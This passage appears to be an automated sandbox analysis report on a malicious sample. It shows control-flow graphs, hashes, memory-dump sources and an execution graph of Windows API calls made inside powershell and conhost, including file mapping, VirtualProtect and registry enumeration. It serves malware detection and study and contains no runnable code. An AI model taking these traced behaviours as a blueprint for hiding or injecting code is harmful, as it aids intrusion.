                                  • Opcode Fuzzy Hash: 447607177f0f1c0622216c216d27aa15d68124854708de61b267b0a62f65a328
                                  • Instruction Fuzzy Hash: 8671D77091CA8D4FDB55EF28C8467E47BE1FF55314F1442AEE84DC72A2DA74E8418B82

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1553 7ffb4b10e8ac-7ffb4b10e8b3 1554 7ffb4b10e8be-7ffb4b10e957 1553->1554 1555 7ffb4b10e8b5-7ffb4b10e8bd 1553->1555 1559 7ffb4b10e9b2-7ffb4b10ea4a CreateFileA 1554->1559 1560 7ffb4b10e959-7ffb4b10e968 1554->1560 1555->1554 1567 7ffb4b10ea4c 1559->1567 1568 7ffb4b10ea52-7ffb4b10ea8e call 7ffb4b10eaaa 1559->1568 1560->1559 1561 7ffb4b10e96a-7ffb4b10e96d 1560->1561 1562 7ffb4b10e96f-7ffb4b10e982 1561->1562 1563 7ffb4b10e9a7-7ffb4b10e9af 1561->1563 1565 7ffb4b10e984 1562->1565 1566 7ffb4b10e986-7ffb4b10e999 1562->1566 1563->1559 1565->1566 1566->1566 1569 7ffb4b10e99b-7ffb4b10e9a3 1566->1569 1567->1568 1573 7ffb4b10ea90 1568->1573 1574 7ffb4b10ea95-7ffb4b10eaa9 1568->1574 1569->1563 1573->1574
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 8551fc606db352fdd3ca20ae9f3422bbc64d9cc98e09f347f6955cd1508d419e
                                  • Instruction ID: f2aa4960af6f9d16a1fb26ebbcda8e0794d9da0c235c6caea455a7db89e6d19d
                                  • Opcode Fuzzy Hash: 8551fc606db352fdd3ca20ae9f3422bbc64d9cc98e09f347f6955cd1508d419e
                                  • Instruction Fuzzy Hash: DE61D97191CB8D8FEF59EF28C8467E877E0FB59310F14426AE84DC3252DA74E8418B91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1599 7ffb4b10ed66-7ffb4b10ed73 1600 7ffb4b10ed7e-7ffb4b10ed8f 1599->1600 1601 7ffb4b10ed75-7ffb4b10ed7d 1599->1601 1602 7ffb4b10ed91-7ffb4b10ed99 1600->1602 1603 7ffb4b10ed9a-7ffb4b10ee51 MapViewOfFile 1600->1603 1601->1600 1602->1603 1607 7ffb4b10ee53 1603->1607 1608 7ffb4b10ee59-7ffb4b10ee76 1603->1608 1607->1608
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: FileView
                                  • String ID:
                                  • API String ID: 3314676101-0
                                  • Opcode ID: 9de779f7f48e12887cbed8c0536406553870e3dfc33211d0d8a4e5e3eb2a596a
                                  • Instruction ID: 5079400724420203b27aa736487a37261fec08f3ee772726c1d37d8dccdcd925
                                  • Opcode Fuzzy Hash: 9de779f7f48e12887cbed8c0536406553870e3dfc33211d0d8a4e5e3eb2a596a
                                  • Instruction Fuzzy Hash: AA41497190CA889FDB09EB78D8466E97BF0FF56321F04426ED089C31A2CB746806CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1619 7ffb4b10e7a8-7ffb4b10e7af 1620 7ffb4b10e7b1-7ffb4b10e7b9 1619->1620 1621 7ffb4b10e7ba-7ffb4b10e870 K32GetModuleInformation 1619->1621 1620->1621 1625 7ffb4b10e872 1621->1625 1626 7ffb4b10e878-7ffb4b10e8a7 1621->1626 1625->1626
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID: InformationModule
                                  • String ID:
                                  • API String ID: 3425974696-0
                                  • Opcode ID: cae56d1028d580da5137674e8204790cf3a03d001c3eb5f25677c2590ef2e964
                                  • Instruction ID: c50835ddc49e68270688ffda536ee3000393717d1c3e4e025d3978064d07ce01
                                  • Opcode Fuzzy Hash: cae56d1028d580da5137674e8204790cf3a03d001c3eb5f25677c2590ef2e964
                                  • Instruction Fuzzy Hash: 24311671D0CA4C8FDB08DBACD8456F9BBE1EB55321F04426FD049D3692CB7468068B91
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa9f87aa0f7a2abe3fba2ea5ebe084dee4671a34b6ba491e02951b03cc902da2
                                  • Instruction ID: 701aee3dcc48dac81fb621677c4c8eb0b108b886057883418ba1217f6547e0ee
                                  • Opcode Fuzzy Hash: aa9f87aa0f7a2abe3fba2ea5ebe084dee4671a34b6ba491e02951b03cc902da2
                                  • Instruction Fuzzy Hash: 61A135A291EBCA4FF796EF3CC8542607BD1EF56214B0844FEC498C71A3D919A80AC791
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2462991396.00007FFB4B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b1d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2043089c701fa78c20209fae998bde3f784c23e79c7090283327a113a43a2989
                                  • Instruction ID: 6caff6f6f5300773ea076951c314cfb0fe04408f88b614110a214f13cc093f6a
                                  • Opcode Fuzzy Hash: 2043089c701fa78c20209fae998bde3f784c23e79c7090283327a113a43a2989
                                  • Instruction Fuzzy Hash: E8214CD3A1EB8A0FF7A5AA7CE4553B5AAC0EF55214F0848BED89DC32D2DC0C6C058391
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.2459640238.00007FFB4B100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B100000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_7ffb4b100000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4104b885858348b41b73eee06f50745b80c244c47ed5b1c1efc368c299ce6436
                                  • Instruction ID: 68d8e9ba1da82776e1f86d8d540971aad519bc9c5d91112bcfb337a79f7d2346
                                  • Opcode Fuzzy Hash: 4104b885858348b41b73eee06f50745b80c244c47ed5b1c1efc368c299ce6436
                                  • Instruction Fuzzy Hash: 94E022D281E7D20EE7536A78A8AF0D43FA0EF0264838800FBC2C44B4B3980B140B4261
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction ID: 2a6e3fdec800ca54c9b53411e3ff9ceb0d2dcee3cb1e590d37e038803082bf72
                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                  • Instruction Fuzzy Hash: 9591267AF0129287DB64CF25E4487BA77D1F758F94F8481389E49A77ACDA38D882C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: 78eefdbdb2e64c758162e426f09b4ca277776b1655114b542b18d5862700ade5
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: D4D16E3AA0478186EB60DF65E4493ED37E4F745B98F104129EE89A7BBADB34C5C1C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 79cb5ccdbb6cfb2828ee567a8d099af0946b15a2b8904480c75ffa832aed7234
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 5D817239E0068B85FA54EB66BC4A3F926E1BB97F80F44453D9904F77BEDA28C4C58700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: 91c8afd89bac6bac8127caefad83cc524d2f464b8c66448e754d4aae7a6245e8
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: FF518F3AA046C28AEB74CF11A54D3A87BE4F355F94F144139DA99A7BB9CB38C8D0C701
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 3242871069-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 572193bf146d3b494bf45c98b2fe352e3418e8d47f1cea54dca98ba0ab49f0be
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: FD518E3AB11A828AEB54DB15F448BB833D1F354F98F158579DA46A77BCD778C881C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000027.00000003.2318956143.000001FE3A940000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FE3A940000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_39_3_1fe3a940000_conhost.jbxd
                                  Similarity
                                  • API ID: CallTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3163161869-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: ef8b09495267377b78a5d01fc467ac5d8c353fbf0b68bf54cf7e2c314a9cc293
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: E8618E36908BC585DB70DB15F4443EABBE4F785B88F044229EB9967BA9CB78C1D0CB00

                                  Execution Graph

                                  Execution Coverage:2.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:6.2%
                                  Total number of Nodes:1925
                                  Total number of Limit Nodes:28
                                  execution_graph 15721 1c0401c25dc 15722 1c0401c265a 15721->15722 15723 1c0401c26bf GetFileType 15722->15723 15729 1c0401c2777 15722->15729 15724 1c0401c26cd StrCpyW 15723->15724 15725 1c0401c26e1 15723->15725 15730 1c0401c26ee 15724->15730 15732 1c0401c1ad4 GetFinalPathNameByHandleW 15725->15732 15730->15729 15737 1c0401c3f88 15730->15737 15740 1c0401c3708 StrCmpIW 15730->15740 15744 1c0401c1dd4 15730->15744 15733 1c0401c1b3d 15732->15733 15734 1c0401c1afe StrCmpNIW 15732->15734 15733->15730 15734->15733 15735 1c0401c1b18 lstrlenW 15734->15735 15735->15733 15736 1c0401c1b2a StrCpyW 15735->15736 15736->15733 15738 1c0401c3faa 15737->15738 15739 1c0401c3f95 StrCmpNIW 15737->15739 15738->15730 15739->15738 15741 1c0401c373a StrCpyW StrCatW 15740->15741 15742 1c0401c3751 PathCombineW 15740->15742 15743 1c0401c375a 15741->15743 15742->15743 15743->15730 15745 1c0401c1df4 15744->15745 15746 1c0401c1deb 15744->15746 15745->15730 15748 1c0401c1530 15746->15748 15749 1c0401c1580 15748->15749 15752 1c0401c154a 15748->15752 15749->15745 15750 1c0401c1569 StrCmpW 15750->15752 15751 1c0401c1561 StrCmpIW 15751->15752 15752->15749 15752->15750 15752->15751 17909 1c0401cf6dc 17910 1c0401cf6e8 17909->17910 17912 1c0401cf70f 17910->17912 17913 1c0401d1c0c 17910->17913 17914 1c0401d1c4c 17913->17914 17915 1c0401d1c11 17913->17915 17914->17910 17916 1c0401d1c44 17915->17916 17917 1c0401d1c32 DeleteCriticalSection 17915->17917 17918 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17916->17918 17917->17916 17917->17917 17918->17914 15785 1c0401cc1d8 15786 1c0401cc1f1 15785->15786 15788 1c0401cc209 15785->15788 15786->15788 15789 1c0401cd2a0 15786->15789 15790 1c0401cd2d6 15789->15790 15791 1c0401cd2a5 HeapFree 15789->15791 15790->15788 15791->15790 15792 1c0401cd2c0 GetLastError 15791->15792 15793 1c0401cd2cd Concurrency::details::SchedulerProxy::DeleteThis 15792->15793 15795 1c0401cd1f4 15793->15795 15798 1c0401ccb10 15795->15798 15799 1c0401ccb59 GetLastError 15798->15799 15800 1c0401ccb2f Concurrency::details::SchedulerProxy::DeleteThis 15798->15800 15801 1c0401ccb6c 15799->15801 15803 1c0401ccb54 15800->15803 15807 1c0401cc940 GetLastError 15800->15807 15802 1c0401ccb8a SetLastError 15801->15802 15804 1c0401ccb87 15801->15804 15805 1c0401cc940 _invalid_parameter_noinfo 11 API calls 15801->15805 15802->15803 15803->15790 15804->15802 15805->15804 15809 1c0401cc966 15807->15809 15808 1c0401cc96c SetLastError 15811 1c0401cc9e5 15808->15811 15809->15808 15825 1c0401cd220 15809->15825 15811->15803 15813 1c0401cc9a5 FlsSetValue 15816 1c0401cc9c8 15813->15816 15817 1c0401cc9b1 FlsSetValue 15813->15817 15814 1c0401cc995 FlsSetValue 15815 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15814->15815 15818 1c0401cc9a3 15815->15818 15832 1c0401cc758 15816->15832 15819 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15817->15819 15818->15808 15824 1c0401cc9c6 SetLastError 15819->15824 15824->15811 15831 1c0401cd231 _invalid_parameter_noinfo 15825->15831 15826 1c0401cd282 15828 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 15826->15828 15827 1c0401cd266 HeapAlloc 15829 1c0401cc987 15827->15829 15827->15831 15828->15829 15829->15813 15829->15814 15831->15826 15831->15827 15837 1c0401cb470 15831->15837 15846 1c0401cc630 15832->15846 15840 1c0401cb4c0 15837->15840 15845 1c0401cc558 EnterCriticalSection 15840->15845 15858 1c0401cc558 EnterCriticalSection 15846->15858 19029 1c0401cb0d4 19035 1c0401cb007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 19029->19035 19030 1c0401cb0fb 19031 1c0401c9324 __CxxCallCatchBlock 9 API calls 19030->19031 19032 1c0401cb100 19031->19032 19033 1c0401c9324 __CxxCallCatchBlock 9 API calls 19032->19033 19034 1c0401cb10b __FrameHandler3::GetHandlerSearchState 19032->19034 19033->19034 19035->19030 19035->19034 19036 1c0401c99cc 9 API calls Is_bad_exception_allowed 19035->19036 19037 1c0401c99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 19035->19037 19036->19035 19037->19035 17937 1c0401c86d0 17938 1c0401c90c0 __std_exception_copy 38 API calls 17937->17938 17939 1c0401c86f9 17938->17939 15935 1c0401d19d0 15938 1c0401ce864 15935->15938 15939 1c0401ce8b6 15938->15939 15940 1c0401ce871 15938->15940 15944 1c0401ccacc 15940->15944 15942 1c0401ce8a0 15949 1c0401ce53c 15942->15949 15945 1c0401ccae8 FlsGetValue 15944->15945 15946 1c0401ccae4 15944->15946 15945->15946 15947 1c0401ccafe 15946->15947 15948 1c0401cc940 _invalid_parameter_noinfo 13 API calls 15946->15948 15947->15942 15948->15947 15972 1c0401ce7ac 15949->15972 15956 1c0401ce5a7 15958 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15956->15958 15957 1c0401ce5b6 15998 1c0401ce8e0 15957->15998 15969 1c0401ce58e 15958->15969 15961 1c0401ce6b2 15962 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15961->15962 15963 1c0401ce6b7 15962->15963 15965 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15963->15965 15964 1c0401ce70d 15967 1c0401ce774 15964->15967 16009 1c0401ce05c 15964->16009 15965->15969 15966 1c0401ce6cc 15966->15964 15970 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15966->15970 15968 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15967->15968 15968->15969 15969->15939 15970->15964 15973 1c0401ce7cf 15972->15973 15980 1c0401ce7d9 15973->15980 16024 1c0401cc558 EnterCriticalSection 15973->16024 15979 1c0401ce571 15984 1c0401ce22c 15979->15984 15980->15979 15981 1c0401ccacc 14 API calls 15980->15981 15982 1c0401ce8a0 15981->15982 15983 1c0401ce53c 56 API calls 15982->15983 15983->15979 16025 1c0401cdd78 15984->16025 15987 1c0401ce24c GetOEMCP 15989 1c0401ce273 15987->15989 15988 1c0401ce25e 15988->15989 15990 1c0401ce263 GetACP 15988->15990 15989->15969 15991 1c0401cc5d0 15989->15991 15990->15989 15992 1c0401cc61b 15991->15992 15996 1c0401cc5df _invalid_parameter_noinfo 15991->15996 15994 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15992->15994 15993 1c0401cc602 HeapAlloc 15995 1c0401cc619 15993->15995 15993->15996 15994->15995 15995->15956 15995->15957 15996->15992 15996->15993 15997 1c0401cb470 _invalid_parameter_noinfo 2 API calls 15996->15997 15997->15996 15999 1c0401ce22c 16 API calls 15998->15999 16000 1c0401ce91b 15999->16000 16001 1c0401cea71 16000->16001 16002 1c0401ce958 IsValidCodePage 16000->16002 16008 1c0401ce972 16000->16008 16073 1c0401c8070 16001->16073 16002->16001 16004 1c0401ce969 16002->16004 16006 1c0401ce998 GetCPInfo 16004->16006 16004->16008 16006->16001 16006->16008 16062 1c0401ce344 16008->16062 16174 1c0401cc558 EnterCriticalSection 16009->16174 16026 1c0401cdd9c 16025->16026 16027 1c0401cdd97 16025->16027 16026->16027 16033 1c0401ccab0 16026->16033 16027->15987 16027->15988 16029 1c0401cddb7 16041 1c0401cffb4 16029->16041 16034 1c0401ccb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16033->16034 16036 1c0401ccab9 16034->16036 16035 1c0401ccabe 16035->16029 16036->16035 16037 1c0401ccae8 FlsGetValue 16036->16037 16039 1c0401ccae4 16036->16039 16037->16039 16038 1c0401ccafe 16038->16029 16039->16038 16040 1c0401cc940 _invalid_parameter_noinfo 13 API calls 16039->16040 16040->16038 16042 1c0401cddda 16041->16042 16043 1c0401cffc9 16041->16043 16045 1c0401d0020 16042->16045 16043->16042 16049 1c0401d0a40 16043->16049 16046 1c0401d0048 16045->16046 16047 1c0401d0035 16045->16047 16046->16027 16047->16046 16059 1c0401ce8c4 16047->16059 16050 1c0401ccab0 _invalid_parameter_noinfo 14 API calls 16049->16050 16051 1c0401d0a4f 16050->16051 16057 1c0401d0a95 16051->16057 16058 1c0401cc558 EnterCriticalSection 16051->16058 16057->16042 16060 1c0401ccab0 _invalid_parameter_noinfo 14 API calls 16059->16060 16061 1c0401ce8cd 16060->16061 16063 1c0401ce38f GetCPInfo 16062->16063 16072 1c0401ce485 16062->16072 16069 1c0401ce3a2 16063->16069 16063->16072 16064 1c0401c8070 _invalid_parameter_noinfo 8 API calls 16065 1c0401ce524 16064->16065 16065->16001 16082 1c0401d1474 16069->16082 16072->16064 16074 1c0401c8079 16073->16074 16075 1c0401c8848 IsProcessorFeaturePresent 16074->16075 16076 1c0401c8084 16074->16076 16077 1c0401c8860 16075->16077 16076->15961 16076->15966 16169 1c0401c891c RtlCaptureContext 16077->16169 16083 1c0401cdd78 14 API calls 16082->16083 16084 1c0401d14b6 16083->16084 16102 1c0401cec58 16084->16102 16103 1c0401cec61 MultiByteToWideChar 16102->16103 16170 1c0401c8936 RtlLookupFunctionEntry 16169->16170 16171 1c0401c894c RtlVirtualUnwind 16170->16171 16172 1c0401c8873 16170->16172 16171->16170 16171->16172 16173 1c0401c8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16172->16173 18280 1c0401c5fcc 18281 1c0401c5fd3 18280->18281 18282 1c0401c6000 VirtualProtect 18281->18282 18283 1c0401c5f10 18281->18283 18282->18283 18284 1c0401c6029 GetLastError 18282->18284 18284->18283 18290 1c0401c1bc4 18297 1c0401c1724 GetProcessHeap HeapAlloc 18290->18297 18292 1c0401c1bd3 18293 1c0401c1bda Sleep 18292->18293 18296 1c0401c159c StrCmpIW StrCmpW 18292->18296 18348 1c0401c19b0 18292->18348 18294 1c0401c1724 50 API calls 18293->18294 18294->18292 18296->18292 18365 1c0401c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18297->18365 18299 1c0401c174c 18366 1c0401c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18299->18366 18301 1c0401c1754 18367 1c0401c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18301->18367 18303 1c0401c175d 18368 1c0401c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18303->18368 18305 1c0401c1766 18369 1c0401c1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18305->18369 18307 1c0401c176f 18370 1c0401c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18307->18370 18309 1c0401c1778 18371 1c0401c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18309->18371 18311 1c0401c1781 18372 1c0401c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18311->18372 18313 1c0401c178a RegOpenKeyExW 18314 1c0401c17bc RegOpenKeyExW 18313->18314 18315 1c0401c19a2 18313->18315 18316 1c0401c17fb RegOpenKeyExW 18314->18316 18317 1c0401c17e5 18314->18317 18315->18292 18319 1c0401c181f 18316->18319 18320 1c0401c1836 RegOpenKeyExW 18316->18320 18373 1c0401c12b8 RegQueryInfoKeyW 18317->18373 18382 1c0401c104c RegQueryInfoKeyW 18319->18382 18323 1c0401c185a 18320->18323 18324 1c0401c1871 RegOpenKeyExW 18320->18324 18326 1c0401c12b8 16 API calls 18323->18326 18327 1c0401c18ac RegOpenKeyExW 18324->18327 18328 1c0401c1895 18324->18328 18329 1c0401c1867 RegCloseKey 18326->18329 18331 1c0401c18e7 RegOpenKeyExW 18327->18331 18332 1c0401c18d0 18327->18332 18330 1c0401c12b8 16 API calls 18328->18330 18329->18324 18336 1c0401c18a2 RegCloseKey 18330->18336 18334 1c0401c190b 18331->18334 18335 1c0401c1922 RegOpenKeyExW 18331->18335 18333 1c0401c12b8 16 API calls 18332->18333 18337 1c0401c18dd RegCloseKey 18333->18337 18338 1c0401c104c 6 API calls 18334->18338 18339 1c0401c195d RegOpenKeyExW 18335->18339 18340 1c0401c1946 18335->18340 18336->18327 18337->18331 18341 1c0401c1918 RegCloseKey 18338->18341 18343 1c0401c1998 RegCloseKey 18339->18343 18344 1c0401c1981 18339->18344 18342 1c0401c104c 6 API calls 18340->18342 18341->18335 18345 1c0401c1953 RegCloseKey 18342->18345 18343->18315 18346 1c0401c104c 6 API calls 18344->18346 18345->18339 18347 1c0401c198e RegCloseKey 18346->18347 18347->18343 18387 1c0401c14a0 18348->18387 18365->18299 18366->18301 18367->18303 18368->18305 18369->18307 18370->18309 18371->18311 18372->18313 18374 1c0401c1486 RegCloseKey 18373->18374 18375 1c0401c1323 GetProcessHeap HeapAlloc 18373->18375 18374->18316 18376 1c0401c134e RegEnumValueW 18375->18376 18377 1c0401c1472 GetProcessHeap HeapFree 18375->18377 18379 1c0401c13a1 18376->18379 18377->18374 18378 1c0401c1530 2 API calls 18378->18379 18379->18376 18379->18377 18379->18378 18380 1c0401c13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18379->18380 18381 1c0401c141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 18379->18381 18380->18381 18381->18379 18383 1c0401c11b5 RegCloseKey 18382->18383 18385 1c0401c10bf 18382->18385 18383->18320 18384 1c0401c10cf RegEnumValueW 18384->18385 18385->18383 18385->18384 18386 1c0401c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 18385->18386 18386->18385 18388 1c0401c14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 18387->18388 18389 1c0401c14c2 GetProcessHeap HeapFree 18387->18389 18389->18388 18389->18389 16175 1c0401c81c0 16176 1c0401c81c9 __scrt_release_startup_lock 16175->16176 16178 1c0401c81cd 16176->16178 16179 1c0401cbbb4 16176->16179 16180 1c0401cbbd4 16179->16180 16207 1c0401cbbed 16179->16207 16181 1c0401cbbdc 16180->16181 16182 1c0401cbbf2 16180->16182 16184 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16181->16184 16183 1c0401ce864 56 API calls 16182->16183 16186 1c0401cbbf7 16183->16186 16185 1c0401cbbe1 16184->16185 16208 1c0401cd04c 16185->16208 16211 1c0401cdf38 GetModuleFileNameW 16186->16211 16194 1c0401cbc69 16196 1c0401cd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16194->16196 16195 1c0401cbc7a 16197 1c0401cb994 14 API calls 16195->16197 16198 1c0401cbc6e 16196->16198 16200 1c0401cbc96 16197->16200 16199 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16198->16199 16199->16207 16200->16198 16201 1c0401cbcdf 16200->16201 16202 1c0401cbcc6 16200->16202 16204 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16201->16204 16203 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16202->16203 16205 1c0401cbccf 16203->16205 16204->16198 16206 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16205->16206 16206->16207 16207->16178 16235 1c0401ccef8 16208->16235 16212 1c0401cdf7d GetLastError 16211->16212 16213 1c0401cdf91 16211->16213 16300 1c0401cd184 16212->16300 16215 1c0401cdd78 14 API calls 16213->16215 16216 1c0401cdfbf 16215->16216 16217 1c0401cdfd0 16216->16217 16305 1c0401cf198 16216->16305 16309 1c0401cde1c 16217->16309 16218 1c0401c8070 _invalid_parameter_noinfo 8 API calls 16221 1c0401cbc0e 16218->16221 16223 1c0401cb994 16221->16223 16222 1c0401cdf8a 16222->16218 16225 1c0401cb9d2 16223->16225 16227 1c0401cba38 16225->16227 16326 1c0401cec1c 16225->16326 16226 1c0401cbb25 16229 1c0401cbb54 16226->16229 16227->16226 16228 1c0401cec1c 14 API calls 16227->16228 16228->16227 16230 1c0401cbb6c 16229->16230 16231 1c0401cbba4 16229->16231 16230->16231 16232 1c0401cd220 _invalid_parameter_noinfo 13 API calls 16230->16232 16231->16194 16231->16195 16233 1c0401cbb9a 16232->16233 16234 1c0401cd2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16233->16234 16234->16231 16236 1c0401ccf23 16235->16236 16243 1c0401ccf94 16236->16243 16238 1c0401ccf4a 16239 